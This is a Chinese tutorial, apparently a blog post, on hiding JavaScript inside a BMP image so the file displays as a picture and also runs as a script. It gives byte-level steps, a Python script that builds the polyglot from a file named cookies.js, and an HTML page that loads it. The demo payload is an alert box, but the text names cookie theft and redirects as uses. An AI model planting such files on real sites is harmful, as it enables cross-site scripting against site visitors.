這里以位圖 BMP 為例演示圖片文件黑客攻擊的原理及實(shí)現(xiàn)。

創(chuàng)建位圖

創(chuàng)建或者隨便找一個(gè)位圖，使用編輯器（本文使用 UltraEdit 作為編輯查看工具）打開(kāi)，可看到 16進(jìn)制數(shù)。

BMP 格式中，前 2 字節(jié)是用于識(shí)別位圖文件格式的字段，可以看到它對(duì)應(yīng) ASCII 碼的 BM，只要該字段正確，圖片文件就能被正確識(shí)別處理，而無(wú)論其余數(shù)據(jù)是否損壞。隨后 4 字節(jié)用于指示文件大小，單位為字節(jié)。

插入腳本

在此基礎(chǔ)上，我們就可以對(duì)圖片動(dòng)一些手腳了，我們可以在圖片中插入一段 JS 腳本。

比如獲取該網(wǎng)頁(yè)cookie的腳本或者重定向到目標(biāo)網(wǎng)站的腳本。這里我們僅作效果演示，所以用了彈框：

window.onload = alert("Image hacked!");

然后我們將腳本插入到圖片中，具體步驟如下：

1. 將2A 2F（即 JS 多行注釋中*/的十六進(jìn)制碼）替換為00 00，防止語(yǔ)法錯(cuò)誤干擾腳本運(yùn)行
2. 在圖片的前兩個(gè)字節(jié)后插入2F 2A（ JS 多行注釋中/*的十六進(jìn)制碼）
3. 在圖片末尾插入FF 2A 2F 3D 31 3B（即*/=1;），其中=1;用于結(jié)束開(kāi)頭的BM。
4. 在圖片最后插入你寫(xiě)好的腳本的十六進(jìn)制碼。

以上操作可以通過(guò) Python 腳本簡(jiǎn)單實(shí)現(xiàn)：

# -*- coding:utf-8 -*-

src_img_name = '靈夢(mèng).bmp'
rst_img_name = 'hackimg.bmp'
append_js_name = 'cookies.js'

with open(src_img_name,'rb') as f:
    buff = f.read()
    buff = buff.replace(b'\x2A\x2F',b'\x00\x00')

with open(rst_img_name,'wb') as f:
    f.write(buff)
    f.seek(2)
    f.write(b'\x2F\x2A')
    f.seek(0,2)
    f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')
    f.write(open(append_js_name,'rb').read())

最后我們得到插入了惡意代碼的位圖文件：

瀏覽器運(yùn)行

創(chuàng)建index.html文件，內(nèi)容如下：

<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>圖片黑客攻擊</title>
</head>
<body>
    <img src="hackimg.bmp" alt="博麗靈夢(mèng)"><!-- 這里我們看到圖片還能正常顯示 -->
    <script src="hackimg.bmp"></script><!-- 腳本也成功執(zhí)行了 -->
</body>
</html>

運(yùn)行效果如下：

其他圖片格式也可以通過(guò)類(lèi)似的操作實(shí)現(xiàn)。